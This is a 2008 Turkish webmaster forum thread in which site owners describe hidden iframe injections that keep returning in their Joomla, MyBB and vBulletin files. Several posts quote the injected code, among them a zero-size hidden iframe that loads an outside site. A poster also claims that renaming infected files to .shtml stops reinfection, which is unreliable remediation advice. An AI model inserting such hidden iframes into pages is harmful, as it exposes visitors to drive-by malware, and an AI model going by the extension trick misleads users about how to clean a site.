• 28-12-2008, 11:16:12
    #1
    Üyeliği durduruldu
    Merhaba Arkadaşlar;

    Benim 2 Tane Sitemede (Joomla - MyBB) thedeatpit.com adlı virüs bulaştı. <iframe> kodu içeriyor bu virüs. Bu virüs her siteyemi bulaşıyor yoksa benim bilgisayarımdamı birşey var?

    Teşekkürler..
  • 28-12-2008, 11:17:25
    #2
    Eposta Aktivasyonu Gerekmekte
    İndex.php veya footer.php den virüsü sil güzelce. Sonra Ftp şifreni değiş kimseyede verme bir süre bekle.
  • 28-12-2008, 11:22:19
    #3
    Üyeliği durduruldu
    Sildim de şimdilik. Bir Sitede Okumuştum. Bu Virüs Çoğu Kişiye Buluşuyor koduda ;
    <iframe="http://www.thedeatpit.com?click=123456">
    Böyle Bir Kod. Ben Sildim. Her Zaman Bulaşıyor (muş..)
  • 28-12-2008, 11:29:36
    #4
    Eposta Aktivasyonu Gerekmekte
    Sen silip şifreni değiştir bi bakalım yinede.
  • 28-12-2008, 11:37:09
    #5
    Kimlik doğrulama veya yönetimden onay bekliyor.
    Dün forumdan bir arkadaşta vardı bu virüs. Yaklaşık 56 vbulletin dosyasına bulaşmıştı yanlış hatırlamıyorsam. O virüsü silersin sonra tekrar geri gelir. Kurtuluşun yok gibi. Ancak dün deneme yaparken kendimce bir yöntem buldum ve işe yaradı. Arkadaştan tamamen temizledik.
    Virüs bulaşmış olan dosyalarının uzantısını değiştir. Virüs; htm php html gibi uzantıları tanıyabiliyor. Dolayısıyla sen virüsü silsen bile kendi tekrar yerleşiyor. Bu yüzden uzantıyı shtml yap. Ben arkadaşa yardım ederken siteme script kuruyor ve index sayfamı shtml yapıyordum Arkadaşa da denedim ve oldu. Bunu sürekli yapmayacaksın tabii ki. Shtml yap ve onayla. Yani sitenin indexi değişsin. Sonra tekrar eski haline getir. Virüsü yemeyeceksin.
  • 28-12-2008, 12:01:12
    #6
    Üyeliği durduruldu
    inş bize bulaşmaz
  • 28-12-2008, 22:03:42
    #7
    Kimlik doğrulama veya yönetimden onay bekliyor.
    Önce virüsü bilgisayarından temizlemeye bak. Yoksa ftpye o bilgisayardan girdikçe aynı sonuç ortaya çıkar. Bilgisayarını temizle, virüsü sil, ftp şifresini güvenli olduğun bir bilgisayardan değiştir.
  • 29-12-2008, 00:05:50
    #8
    ya o virüs bana da bulaştı.tüm sitelerime bulaştı hatta.

    bende google chorome ile dolaşırkan googlede aratıp , nerelerde çıktığıma bakıyordum , bi baktım bu site zararlı içerik içeriyor felan diye yazıyor. devam edip kaynağı goruntule dedim, en altta dediğiniz kod, hemen ftp login olup , index i düzenledim , 15 dk sonra yine olmus , tüm sitelerimi kontrol ettim. hepsinde var

    bir de dediğniz uzantı değiştirme yontemini deneyeceğim.

    bu arada asıl anlamadığım konu ise, bilgisayarıma format attım, 2,5 saat sonra siteme bu virüsün qirmiş olduğunu farkettim.
  • 29-12-2008, 04:21:00
    #9
    Aynen banada bulasti
    <iframe src="http://burakulker.net/x/" width="0" height="0" frameborder="0"></iframe>